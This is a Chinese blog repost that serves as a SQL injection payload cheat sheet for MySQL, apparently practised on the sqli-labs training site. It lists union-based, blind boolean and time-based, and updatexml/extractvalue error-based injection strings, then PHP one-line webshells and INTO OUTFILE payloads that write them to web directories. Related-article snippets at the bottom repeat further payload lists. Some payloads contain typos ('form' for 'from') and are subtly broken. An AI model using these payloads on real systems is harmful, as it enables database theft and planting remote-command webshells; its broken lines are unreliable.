payload sql注入_sql注入之payload

最新推荐文章于 2024-03-11 14:30:00 发布
最新推荐文章于 2024-03-11 14:30:00 发布
阅读量455 收藏 1
点赞数
文章标签: payload sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28007513/article/details/114906614
版权

/*

*GET,post

*有返回

*

*/

基于报错的SQL注入

1、获取字段数

‘ order by 5 --+

2、获取表名

0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

select group_concat(table_name) from information_schema.tables where table_schema=database()

3、获取字段

0‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘ --+

select group_concat(column_name) form information_schema.columns where table_name=‘users‘

/*

*GET,post

*无返回,无报错,

*/

盲注,通常采用下面的办法猜解字符串.

‘ and length(database())=8 --+

‘ and ascii(substr(database(),1,1)) > N --+

‘ and ascii(substr(database(),1,1)) = N --+

‘ and ascii(substr(database(),1,1)) < N --+

//基于时间的盲注,常和布尔盲注结合起来用

//在页面上无论正确与否,都没有任何提示的情况下,用

‘ and if(length(database())=8,sleep(3),null) --+//正确的话就执行sleep

‘ and if(length(database())=8,1,sleep(3)) --+ //正确的话就不执行sleep

‘or if(length(database())=8,sleep(3),null) or ‘1‘=‘1

/*

*GET,post

*无返回,有报错,

*用于select,insert,update,delete语句注入

*/

updatexml()报错的注入

UPDATEXML (XML_document, XPath_string, new_value);?

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc?

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。?

第三个参数:new_value,String格式,替换查找到的符合条件的数据?

payload:

//查询当前MySQL版本

‘and updatexml(1,concat(0x7e,(select @@version)),1) or ‘1‘=‘1

‘or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or ‘

//查询当前数据库名

‘and updatexml(1,concat(0x7e,(select database(),0x7e),1) or ‘1‘=‘1

//查询表名(当前数据库下的)

‘and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or ‘1‘=‘1

//查询字段名(users表中的)

‘and updatexml(1,concat(0x7e,(select group_concat(column_name) form information_schema.columns where table_name=‘users‘),0x7e),1) or ‘1‘=‘1

基于insert/update下的报错

‘or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or ‘

基于delete下的报错

‘or updatexml(1,concat(0x7e,(select @@version),0x7e),1)

extractvalue()

/*#为单行注释

*与updatexml没有什么不同

*/

‘and extractvalue(1,concat(0x7e,(select @@version))) #

/*

*一句话木马

*/

php:<?php @eval($_GET[‘string‘])?>

//sql注入漏洞之 读写文件

//写入文件路径为相对路径时,默认写入到数据库所在文件夹中

1111111‘union select 1,2,"<?php @eval($_GET[‘string‘])?>" into outfile "1.php" --+

//也可以写成绝对路径,此处为Windows的路径

1111111‘union select 1,2,"<?php @eval($_GET[‘string‘])?>" into outfile "D:\\web_security\\1.php" --+

1111111‘union select 1,2,"<?php system($_GET[‘cmd‘])?>" into outfile "D:\\web_security\\1.php" --+

//相对路径的写法

-14‘ union select 1,2,"<?php system($_GET[‘cmd‘])?>" into outfile "../../www/sqli/Less-1/2.php" --+

原文:https://www.cnblogs.com/jiersixi/p/11784769.html

柯尔鸭鸭
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
payload sql注入_优客365_v2.9 SQL注入漏洞复现(附POC)
weixin_39778582的博客
11-27 350
面由心生,相随貌转。俗话说得好HTTP_REFERER注入1、漏洞编号CNVD-2017-120172、漏洞介绍优客365是一个基于 PHP+MYSQL 开发构建的开源网站分类目录管理系统,在 2.9 版本的首页 index.php 存在基于 HTTP-REFERER 字段的 SQL 注入漏洞,攻击者可利用该漏洞执行任意 SQL 语句,获得数据库敏感信息。3、源码分析index.php...
SQL_Injection_PayloadSQL注入有效负载列表
01-28
标题“SQL_Injection_PayloadSQL注入有效负载列表”表明这是一个关于SQL注入攻击中使用的特定字符串或命令集合,通常被称为有效负载。 SQL注入的有效负载是精心构造的SQL语句,旨在欺骗数据库服务器执行非授权...
SQL注入payload(持续更新)
Zeker62的博客
08-31 2649
id='1' order by 3 --+ //%20是空格,%23是# id='2' and 1=2 union select 1,2,datbase()--+ //查数据库 id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表 id='4' and 1=2 union select 1,2,group_co
payload sql注入_SQL注入 payload 记录
weixin_39918588的博客
01-14 106
使用 REGEXP盲注payloadselect user() from users where user_id=1 and (select(user)from users where user_id=1) REGEXP "^adm.*";来源https://www.secpulse.com/archives/68991.html使用 (子查询) in ("x") 盲注Payload通过 mid ...
【WEB安全】SQL注入 payload
qq_42322144的博客
12-16 3000
'"!@#)\(/?; ' " OR 1=1 OR 1=0 OR 1=1 -- OR 1=0 -- ' OR '1'='1 ' OR '1'='0 ' OR 1=1 -- ' OR 1=0 -- " OR "1"="1 " OR "1"="0 " OR 1=1 -- " OR 1=0 -- ") OR 1=1 -- ") OR 1=0 -- ') OR 1=1 -- ') OR 1=0 -- AND 1=1 AND 1=0 AND 1=1 -- AND 1=0 --
payload sql注入_【安全通报】Discuz! X后台SQL注入漏洞安全风险公告
weixin_39531688的博客
12-20 201
↑ 点击上方蓝色字关注我们近日,Discuz! X的管理员后台SQL注入具体利用细节被披露。Discuz! 是一套基于PHP+MYSQL开发的通用性社区论坛软件系统,在国内备受用户喜爱,用户量较大。该漏洞成因是由于将appid值写入配置文件config_ucenter.php之中未进行严格的过滤。在页面刷新的时,会将config_ucenter.php中的UC_APPID取出,并拼接进S...
如何使用加密的Payload来识别并利用SQL注入漏洞
weixin_33758863的博客
08-01 332
写在前面的话 密码学具有诸多优点,信息的保密性同样离不开密码学,但是从历史经验来看,在保护应用和数据安全方面我们绝对不能过分依赖于密码学。在这篇文章中,安全教育培训专家SunilYadav将会讨论一个案例,并介绍如何通过一个加密的Payload来发现并利用SQL注入漏洞。 请注意:我们在此不打算讨论密码学方面的问题(例如如何破解加密算法),我们讨论的是应...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入靶场.zip
06-24
在实践中,你将学习如何识别注入点,构造适当的payloadpayload是注入的恶意SQL代码),并利用工具如Burp Suite、SQLMap等自动化工具来帮助测试和利用这些漏洞。同时,你也会了解到防止SQL注入的最佳实践,如参数化...
SQL注入思路详解
12-14
2. **SQL注入语句测试**:在测试阶段,攻击者会使用各种payload(即注入的SQL代码片段)来探测系统是否对SQL注入敏感。由于很多网站有WAF(Web应用防火墙)或代码级别的过滤器,测试时通常会选择最简单的payload,如...
泛微OA8前台sql注入1
08-08
【泛微OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们关注的是针对泛微OA8系统的一个前台SQL注入...
SQL注入POST注入
weixin_43765321的博客
03-03 3703
1. POST请求介绍 1.1 POST消息头实例 1.2 POST请求介绍 POST方法起初是用来向服务器输入数据的 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交/文件上传等,请求会被包含在请求体中 POST方法可能会创建新的资源或修改现有资源 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 1.3 POST请求特点 POST请求不能被缓存下来 POST请求不会保存在浏览器
SQL注入(没有原理,分类payload
weixin_46709219的博客
08-13 740
一)关于数据库的一些基本知识: MySQL5.0以下,没有information_schema这个系统表,无法列表名等,只能暴力跑表名。 MySQL5.0以上,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。 mysql中注释符: 单行注释:#       多行注释:/**/ information_schema数据库中三个很重要的表: 1)in
CVE-2015-3934 sql盲注payload
qq_26317875的博客
04-15 1445
刚刚看到CVE-2015-3934这个sql注入漏洞,发现实验机器给的脚本不算太完整,略过了数据库名和表名的猜解,直接从字段名猜解开始了。这里以这个漏洞的payload为例,写一下整个的大体流程,也梳理一下。这个一个基于时间的sql盲注:python脚本,通过sql的sleep()函数控制时间,配合requests库中的timeout选项,来判断返回原查询语句为:用来判断注入点的语句为(语句包含单...
SQL注入-产生位置+post注入+sqlmap
xiaoheizi的博客
06-28 360
—url没有参数并不代表没有注入,有时会在数据包中,http数据包中每个部分只要可以被接收,都可能产生漏洞。还有一种方式,不用保存数据包,可以直接扫描,就是使用。信息进行对比,涉及到数据库查询操作。信息整理保存,用户访问后数据库会获取用户的。网站根据用户的访问设备给予显示页面。会写到数据库,如果能自定义。测试显错位,结果直接爆出了。,然后将数据包中的两个。参数传递位置:可以在。测试出字段数后,输入。抓取登录数据包,右键。
利用sql注入
QWE34534的博客
10-04 338
INSERT查询中实现注入攻击 1. 思路就是在含有insert语句的页面插入目标值信息。经常包含的是一个子查询。 2. 注意在insert过程中,左边的注入点和右边的注入点会有不同 3. 在mysql中数字的优先级会高于字符的优先级,在1+'s'结果只显示1 4. 利用此性质,配合ASCII函数可以获得大部分目标的值。 生成INSERT错误 1. 在insert语句的值中填写表不允许的...
pikachu-SQL注入
qq_43660551的博客
05-11 1353
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
SQL注入-SQLi-LABS靶场1-65完整payload
问彡心的博客
12-27 1185
【代码】SQL注入-SQLi-LABS靶场1-65完整payload
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
最新发布
Karka_的博客
03-11 989
🏆今日学习目标:🍀学习了解sql注入漏洞✅创作者:贤鱼⏰预计时间:35分钟具体详细介绍在专栏中有单独介绍,可以查看只有了解才能注入。
sql注入payload
09-01
SQL注入payload是一种用于测试和利用SQL注入漏洞的代码片段。以下是一些常见的SQL注入payload的示例: 1. 基于单引号字符型注入的payload: ' OR 1=1 -- 这个payload的目的是通过在注入点处插入注释符和逻辑运算符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值